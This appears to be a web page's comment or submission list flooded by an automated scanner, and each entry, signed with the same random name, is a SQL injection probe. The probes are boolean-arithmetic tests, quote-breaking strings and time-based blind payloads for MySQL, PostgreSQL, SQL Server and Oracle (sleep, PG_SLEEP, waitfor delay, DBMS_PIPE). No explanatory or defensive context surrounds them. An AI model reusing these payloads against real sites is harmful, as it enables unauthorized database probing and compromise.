  • lxbfYeaa
    -1 OR 2+682-682-1=0+0+0+1
  • lxbfYeaa
    -1 OR 3+682-682-1=0+0+0+1
  • lxbfYeaa
    RLIKE (SELECT (CASE WHEN (435=435) THEN 1 ELSE 0x28 END)) --
  • lxbfYeaa
    if(now()=sysdate(),sleep(15),0)
  • lxbfYeaa
    0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  • lxbfYeaa
    0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  • lxbfYeaa
    -1 OR 2+218-218-1=0+0+0+1 --
  • lxbfYeaa
    -1 OR 3+218-218-1=0+0+0+1 --
  • lxbfYeaa
    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  • lxbfYeaa
    -1 OR 2+171-171-1=0+0+0+1
  • lxbfYeaa
    -1 OR 3+171-171-1=0+0+0+1
  • lxbfYeaa
    -1' OR 2+247-247-1=0+0+0+1 --
  • lxbfYeaa
    -1' OR 3+247-247-1=0+0+0+1 --
  • lxbfYeaa
    -1' OR 2+639-639-1=0+0+0+1 or 'iKQdFFJm'='
  • lxbfYeaa
    -1' OR 3+639-639-1=0+0+0+1 or 'iKQdFFJm'='
  • lxbfYeaa
    -1" OR 2+606-606-1=0+0+0+1 --
  • lxbfYeaa
    -1" OR 3+606-606-1=0+0+0+1 --
  • lxbfYeaa
    -1
  • lxbfYeaa
    if(now()=sysdate(),sleep(15),0)
  • lxbfYeaa
    -1)
  • lxbfYeaa
    0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  • lxbfYeaa
    1 waitfor delay '0:0:15' --
  • lxbfYeaa
    0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  • lxbfYeaa
    AcvCRvoC'
  • lxbfYeaa
    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  • lxbfYeaa
    -5 OR 139=(SELECT 139 FROM PG_SLEEP(15))--
  • lxbfYeaa
    -1
  • lxbfYeaa
    -5) OR 579=(SELECT 579 FROM PG_SLEEP(15))--
  • lxbfYeaa
    -1)
  • lxbfYeaa
    -1)) OR 839=(SELECT 839 FROM PG_SLEEP(15))--
  • lxbfYeaa
    1 waitfor delay '0:0:15' --
  • lxbfYeaa
    K6SrqJMM' OR 58=(SELECT 58 FROM PG_SLEEP(15))--
  • lxbfYeaa
    gnzcUjmK'
  • lxbfYeaa
    6XTp4HLJ') OR 848=(SELECT 848 FROM PG_SLEEP(15))--
  • lxbfYeaa
    -5 OR 377=(SELECT 377 FROM PG_SLEEP(15))--
  • lxbfYeaa
    95hlEbF2')) OR 800=(SELECT 800 FROM PG_SLEEP(15))--
  • lxbfYeaa
    -5) OR 375=(SELECT 375 FROM PG_SLEEP(15))--
  • lxbfYeaa
    *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  • lxbfYeaa
    -1)) OR 62=(SELECT 62 FROM PG_SLEEP(15))--
  • lxbfYeaa
    '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  • lxbfYeaa
    1'"
  • lxbfYeaa
    0ZbALD03' OR 242=(SELECT 242 FROM PG_SLEEP(15))--
  • lxbfYeaa
    -1 OR 2+501-501-1=0+0+0+1 --
  • lxbfYeaa
    -1 OR 3+501-501-1=0+0+0+1 --
  • lxbfYeaa
    @@8CwF1
  • lxbfYeaa
    -1 OR 2+628-628-1=0+0+0+1
  • lxbfYeaa
    -1 OR 3+628-628-1=0+0+0+1
  • lxbfYeaa
    -1' OR 2+875-875-1=0+0+0+1 --
  • lxbfYeaa
    -1' OR 3+875-875-1=0+0+0+1 --
  • lxbfYeaa
    -1' OR 2+783-783-1=0+0+0+1 or 'Be1Rhr4M'='
  • lxbfYeaa
    -1' OR 3+783-783-1=0+0+0+1 or 'Be1Rhr4M'='
  • lxbfYeaa
    -1" OR 2+489-489-1=0+0+0+1 --
  • lxbfYeaa
    -1" OR 3+489-489-1=0+0+0+1 --
  • lxbfYeaa
    t9c4U9WY') OR 973=(SELECT 973 FROM PG_SLEEP(15))--
  • lxbfYeaa
    if(now()=sysdate(),sleep(15),0)
  • lxbfYeaa
    cjB8iGiV')) OR 857=(SELECT 857 FROM PG_SLEEP(15))--
  • lxbfYeaa
    0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  • lxbfYeaa
    *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  • lxbfYeaa
    0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  • lxbfYeaa
    '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  • lxbfYeaa
    1'"
  • lxbfYeaa
    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  • lxbfYeaa
    @@HBxf9
  • lxbfYeaa
    -1
  • lxbfYeaa
    -1)
  • lxbfYeaa
    1 waitfor delay '0:0:15' --
  • lxbfYeaa
    Z1Vt9au8'
  • lxbfYeaa
    -5 OR 564=(SELECT 564 FROM PG_SLEEP(15))--
  • lxbfYeaa
    -5) OR 543=(SELECT 543 FROM PG_SLEEP(15))--
  • lxbfYeaa
    -1)) OR 203=(SELECT 203 FROM PG_SLEEP(15))--
  • lxbfYeaa
    DHy7LDic' OR 527=(SELECT 527 FROM PG_SLEEP(15))--
  • lxbfYeaa
    oIMWbiCd') OR 716=(SELECT 716 FROM PG_SLEEP(15))--
  • lxbfYeaa
    XqEVARVb')) OR 628=(SELECT 628 FROM PG_SLEEP(15))--
  • lxbfYeaa
    *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  • lxbfYeaa
    '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  • lxbfYeaa
    1'"
  • lxbfYeaa
    @@3xmq0